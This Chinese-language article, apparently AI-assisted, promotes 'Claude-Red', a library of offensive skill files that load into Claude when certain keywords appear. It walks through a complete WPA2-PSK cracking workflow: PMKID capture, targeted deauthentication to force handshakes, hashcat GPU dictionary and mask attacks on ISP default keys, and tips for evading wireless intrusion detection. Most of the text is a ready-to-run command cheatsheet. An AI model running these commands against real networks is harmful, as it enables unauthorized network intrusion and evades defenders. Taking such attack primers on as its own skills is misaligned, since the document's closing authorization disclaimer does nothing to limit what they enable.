Claude-Red WPA2-PSK 攻击终极指南:握手捕获、PMKID 与 hashcat GPU 爆破
【免费下载链接】Claude-Redclaude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to exploit development.项目地址: https://gitcode.com/GitHub_Trending/cl/Claude-Red
claude-red是一个面向 Claude 技能的攻击性安全技能库(offensive security skills),其中 offensive-wpa2-psk 技能专门覆盖 WPA2-PSK 攻击方法论:通过定向去认证捕获四路握手(four-way handshake)、无客户端的 PMKID 攻击、hcxtools 格式转换,以及 hashcat 22000 模式的 GPU 加速爆破。对于几乎每台家用和小型企业路由器默认启用的 WPA/WPA2 Personal 加密,这套离线爆破流程是无线渗透测试中最经典、最实用的攻击路径。
为什么 WPA2-PSK 是无线渗透测试的首选目标
WPA2-PSK(即"个人版"Wi-Fi 加密)是消费级和小微企业网络事实上的默认加密方式。它的安全性高度依赖预共享密钥(PSK)的强度,而这恰恰是最常见的短板:
- 📡离线爆破友好:捕获握手或 PMKID 后即可离线爆破,无在线尝试次数限制、无账户锁定
- 🔑弱口令普遍:运营商默认密码(10 位数字)、手机号、公司名 + 年份……弱口令在 PSK 中极其常见
- 📊检测面小:除去认证帧外几乎没有"在线探测"信号;若走 PMKID 路径甚至完全静默
claude-red 项目的无线分类(Wireless)共提供 13 个技能,覆盖从 802.11 总览到蓝牙、Zigbee、LoRaWAN 的完整攻击面,本技能是其中的核心实战技能之一。
快速上手:一键安装 claude-red
将技能文件放入 Claude 的技能目录即可,Claude 会在对话中提到 WPA2-PSK、握手、PMKID 等触发词时自动加载该技能:
# 克隆到 Claude 扫描的目录 git clone https://gitcode.com/GitHub_Trending/cl/Claude-Red ~/.claude/skills/claude-red # 或只安装无线分类(节省空间) ./install.sh --target ~/.claude/skills --category wireless安装脚本见 install.sh,完整技能清单见 claude-skills.json 与 README.md。
环境准备:无线网卡与监听模式
一切攻击的前提是监听模式 + 注入能力。技能库中的 offensive-wifi-recon 技能给出了完整的环境准备清单:
| 步骤 | 命令 | 说明 |
|---|---|---|
| 终止冲突服务 | sudo airmon-ng check kill | 停掉 NetworkManager 等干扰进程 |
| 开启监听模式 | sudo airmon-ng start wlan0 | 生成wlan0mon接口 |
| 设置监管域 | sudo iw reg set US | 解锁合法信道与发射功率 |
| 验证注入能力 | sudo aireplay-ng --test wlan0mon | 建议达到 30/30 确认率 |
💡网卡选择提示:2.4 GHz 可选 Atheros AR9271(Alfa AWUS036NHA),双频段可选 Realtek RTL8812AU(AWUS036ACH),6 GHz 频段需 Wi-Fi 6E 网卡。详见 offensive-wifi-recon 技能。
第一步:优先尝试 PMKID 捕获(最安静)
PMKID 包含在四路握手的第一条消息中,而许多 AP 会响应一次关联请求就直接泄露 PMKID——不需要任何真实客户端参与,是最安静的捕获方式:
# 目标 BSSID 列表(每行一个,必须是你有授权测试的设备) echo "AA:BB:CC:DD:EE:FF" > targets.txt # 用 hcxdumptool 扫描捕获 PMKID sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 # 转换为 hashcat 22000 格式 hcxpcapngtool -o hash.hc22000 pmkid.pcapng--filtermode=2表示只对授权列表中的 BSSID 发起请求,大幅降低被 WIDS 注意的概率- 如果转换出的
hash.hc22000为空,说明该 AP 不泄露 PMKID → 转入下一步握手捕获
第二步:四路握手捕获(定向去认证)
PMKID 拿不到时,就逼客户端重连。核心思路:定向对单个客户端发送少量去认证帧,而非广播风暴。
# 1. 锁定信道,开始抓包 sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon # 2. 对单个客户端发送 5 次定向去认证(低噪音) sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon握手出现时,airodump 右上角会显示WPA handshake: AA:BB:CC:DD:EE:FF。
为什么要定向去认证?广播去认证(不带-c)会立刻触发 WIDS 告警,相当于对着整个网络"开炮"。而 3~10 帧的单个客户端去认证常被误判为漫游行为或射频噪声——这一点在 offensive-deauth-disassoc 技能 的检测对照表中有详细说明。
验证捕获质量:M1+M2 才是有效握手
不是所有抓到的握手都能破解。用 hcxpcapngtool 转换时检查输出:
hcxpcapngtool -o hash.hc22000 handshake-01.cap # 期望看到 "M1+M2 ... AUTHORIZED" 或 "M2 ... AUTHORIZED"若工具报告 M1/M2 帧缺少正确的 EAPOL 认证信息,说明握手不完整——重新捕获,否则后续爆破必定失败。这是新手最常踩的坑。
hashcat GPU 爆破:三种攻击模式
拿到hash.hc22000文件后,用 hashcat 的22000 模式(WPA-PBKDF2-SHA1)进行 GPU 加速爆破。技能中给出三条递进的路径:
1️⃣ 字典 + 规则(首选)
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule推荐词库:
| 词库 | 特点 |
|---|---|
rockyou.txt | 经典入门词库 |
weakpass_3/weakpass_4 | 大规模泄露密码语料 |
crackstation.txt | 高命中率补充词库 |
| 定向词库 | 公司名、产品名、地名 + 年份/手机号变形 |
2️⃣ 掩码攻击:打中运营商默认密码规律
许多 ISP 路由器的默认 PSK 是纯数字,掩码攻击比盲目字典更快命中:
# 10 位数字(UPC、Vodafone 等常见 ISP 默认) hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d # 8 位数字(D-Link、ZTE) hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # 手机号模式 hashcat -m 22000 hash.hc22000 -a 3 1?d?d?d?d?d?d?d?d?d?d3️⃣ 厂商默认密钥生成器
部分运营商路由器的 PSK 由SSID 前缀 + 序列号后缀通过已知算法推导而来,可离线批量生成候选密钥:
# UPC 路由器:根据 ESSID 生成候选 PSK 再爆破 upc_keys ESSID | hashcat -m 22000 hash.hc22000 -其他品牌可查找对应生成器(如 BT-Hub、Zyxel 等),按路由器品牌选择工具。
性能调优与分布式破解
# 查看每块 GPU 的推荐线程/工作组配置 hashcat -b -m 22000 # 多机/多卡分片:把词库切段,各机各跑一段 hashcat -m 22000 hash.hc22000 wordlist.txt -s 0 -l 1000000 hashcat -m 22000 hash.hc22000 wordlist.txt -s 1000000 -l 1000000⚡ GPU 在 PBKDF2-SHA1 这种 CPU 密集型哈希上优势依然显著,
hashcat -b给出的 workload 调优参数能直接提升 20%~40% 的 Hashrate。
完整作战速查表(Engagement Cheatsheet)
技能文件末尾给出了一条龙的实战流程,这里按阶段归纳:
# 1️⃣ 环境准备 sudo airmon-ng check kill && sudo airmon-ng start wlan0 sudo iw reg set US # 2️⃣ 先扫 PMKID(静默) echo "AA:BB:CC:DD:EE:FF" > targets.txt sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 # 3️⃣ 转换并尝试破解 hcxpcapngtool -o hash.hc22000 pmkid.pcapng hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule # 4️⃣ PMKID 为空?转入四路握手捕获 sudo airodump-ng -c <ch> --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon & sudo aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF -c <client> wlan0mon # 5️⃣ 转换 + 字典爆破 hcxpcapngtool -o hash.hc22000 cap-01.cap hashcat -m 22000 hash.hc22000 wordlist.txt -r OneRuleToRuleThemAll.rule # 6️⃣ 字典失败 → 掩码攻击 hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d降低被检测概率的注意事项
| 检测信号 | 防御方视角 | 应对建议 |
|---|---|---|
| 去认证突发 | WIDS 规则:单位时间去认证帧超阈值 | 单客户端 3~10 帧突发,避免广播 |
| PMKID 请求洪水 | 单 MAC 快速关联告警 | 使用--filtermode=2只扫授权列表 |
| 监听模式接口 | 企业 WIDS 会指纹识别邻接监听无线电 | 每次捕获间随机化源 MAC |
此外,若网络启用了802.11r(快速漫游),AP 间切换时 PMK 推导过程可被捕获,同样可用 hc22000 格式破解;启用 OKC(机会性密钥缓存)的网络则会在空中产生更少的 M1/M2 帧对,需要更长捕获时间。
合规提示
⚠️ 本文所有技术细节仅限在已获得书面授权的网络上使用:授权渗透测试项目、自有设备、CTF 演练与教学环境。技能文件本身也明确要求targets.txt只能包含你被授权测试的 BSSID。未经授权的无线入侵在绝大多数司法辖区属于违法行为。
延伸阅读
- 核心技能:Skills/wireless/offensive-wpa2-psk/SKILL.md
- 前期侦察:Skills/wireless/offensive-wifi-recon/SKILL.md
- 去认证细节:Skills/wireless/offensive-deauth-disassoc/SKILL.md
- WPA3 攻击路径:Skills/wireless/offensive-wpa3-sae/SKILL.md
- 全库技能地图:MINDMAP.md | 项目说明:README.md
【免费下载链接】Claude-Redclaude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to exploit development.项目地址: https://gitcode.com/GitHub_Trending/cl/Claude-Red
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考